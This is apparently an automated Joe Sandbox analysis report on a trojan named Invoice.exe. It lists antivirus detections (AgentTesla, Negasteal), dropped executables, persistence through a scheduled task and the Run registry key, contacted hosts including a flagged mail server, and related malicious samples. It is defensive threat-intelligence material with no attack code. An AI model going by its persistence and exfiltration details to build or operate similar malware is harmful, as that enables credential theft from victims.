Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Invoice.exe	50%	ReversingLabs	Win32.Trojan.Generic
Invoice.exe	31%	Virustotal		Browse
Invoice.exe	100%	Avira	HEUR/AGEN.1309753
Invoice.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	100%	Avira	HEUR/AGEN.1309753
C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	100%	Avira	HEUR/AGEN.1309753
C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	34%	ReversingLabs	Win32.Spyware.Negasteal
C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	43%	Virustotal		Browse
C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	34%	ReversingLabs	Win32.Spyware.Negasteal
C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	43%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mail.starmech.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://r3.i.lencr.org/0W	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://mail.starmech.net	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Virustotal		Browse
http://mail.starmech.net	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	1%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
http://www.founder.com.cn/cn	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.starmech.net	207.174.215.249	true	true	0%, Virustotal, Browse	unknown
api.ipify.org	104.26.12.205	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://account.dyn.com/	Invoice.exe, 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://r3.i.lencr.org/0W	Invoice.exe, 0000000A.00000002.4154310279.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4147057049.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.000000000294E000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4199902924.0000000008B2E000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4190838162.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192476931.0000000006202000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192868492.000000000621A000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4201720311.0000000008B86000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4150251612.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4193252475.000000000622C000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4216968494.0000000007EB6000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.0000000001483000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4191864782.0000000006897000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org/t	kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1937601550.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	Invoice.exe, 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002891000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1937601550.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Invoice.exe, 0000000A.00000002.4199556511.0000000008B1E000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4147057049.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4149271573.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192615676.000000000620B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192868492.000000000621A000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4201720311.0000000008B86000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4150251612.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4193252475.000000000622C000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4216968494.0000000007EB6000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4191864782.0000000006897000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031B4000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003305000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003261000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://x1.i.lencr.org/0	Invoice.exe, 0000000A.00000002.4199556511.0000000008B1E000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4147057049.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4149271573.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192615676.000000000620B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4201720311.0000000008B86000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4150251612.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4193252475.000000000622C000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4216968494.0000000007EB6000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4191864782.0000000006897000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031B4000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003305000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003261000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4216968494.0000000007E80000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://r3.o.lencr.org0	Invoice.exe, 0000000A.00000002.4154310279.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4147057049.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.000000000294E000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4199902924.0000000008B2E000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4190838162.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192476931.0000000006202000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192868492.000000000621A000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4201720311.0000000008B86000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4150251612.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4193252475.000000000622C000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4216968494.0000000007EB6000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.0000000001483000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4191864782.0000000006897000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Invoice.exe, 00000000.00000002.1709720176.00000000030E6000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002891000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000B.00000002.1752157316.00000000026E6000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000010.00000002.1855539438.0000000002526000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1937601550.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.1936751210.0000000003196000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	Invoice.exe, 00000000.00000002.1723003703.0000000005940000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.starmech.net	Invoice.exe, 0000000A.00000002.4154310279.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031B4000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003305000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003261000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.000000000318B000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1937601550.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.000000000304B000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.000000000314E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000003191000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
207.174.215.249	mail.starmech.net	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
104.26.13.205	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432075
Start date and time:	2024-04-26 11:41:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Invoice.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@37/20@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 455 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:42:10	Task Scheduler	Run new task: kaJNzBnxbXm path: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe
10:42:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
10:42:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
11:42:07	API Interceptor	6048614x Sleep call for process: Invoice.exe modified
11:42:09	API Interceptor	38x Sleep call for process: powershell.exe modified
11:42:12	API Interceptor	1851112x Sleep call for process: kaJNzBnxbXm.exe modified
11:42:23	API Interceptor	5228789x Sleep call for process: BjTxJte.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
	lods.cmd	Get hash	malicious	Remcos	Browse	api.ipify.org/
207.174.215.249	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse
	V2i5WDBNV7.exe	Get hash	malicious	AgentTesla	Browse
	payment slip.exe	Get hash	malicious	AgentTesla	Browse
	SHIPPING ADVICE.exe	Get hash	malicious	AgentTesla	Browse
	PO 20240105.exe	Get hash	malicious	AgentTesla	Browse
104.26.13.205	SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exe	Get hash	malicious	PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
	Sky-Beta-Setup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	ArenaWarSetup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.RATX-gen.31127.4101.exe	Get hash	malicious	PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	PONO6188.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	Payment details.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Docs.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	PO#50124.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Statement of Account PDF.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	CHEMICAL SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Payment.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SOA FOR APR 2024 PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	Payment Swift.doc	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
mail.starmech.net	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	V2i5WDBNV7.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	payment slip.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	SHIPPING ADVICE.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	PO 20240105.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	172.67.19.24
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	PONO6188.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	Payment details.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Docs.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	PO#50124.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.4.15
	https://deebmpapst.ordineproposal.top/	Get hash	malicious	Unknown	Browse	104.17.2.184
	Statement of Account PDF.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://powerpointmicrosoftoffice.top/	Get hash	malicious	Unknown	Browse	104.17.3.184
CLOUDFLARENETUS	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	172.67.19.24
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	PONO6188.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	Payment details.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Docs.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	PO#50124.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.4.15
	https://deebmpapst.ordineproposal.top/	Get hash	malicious	Unknown	Browse	104.17.2.184
	Statement of Account PDF.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://powerpointmicrosoftoffice.top/	Get hash	malicious	Unknown	Browse	104.17.3.184
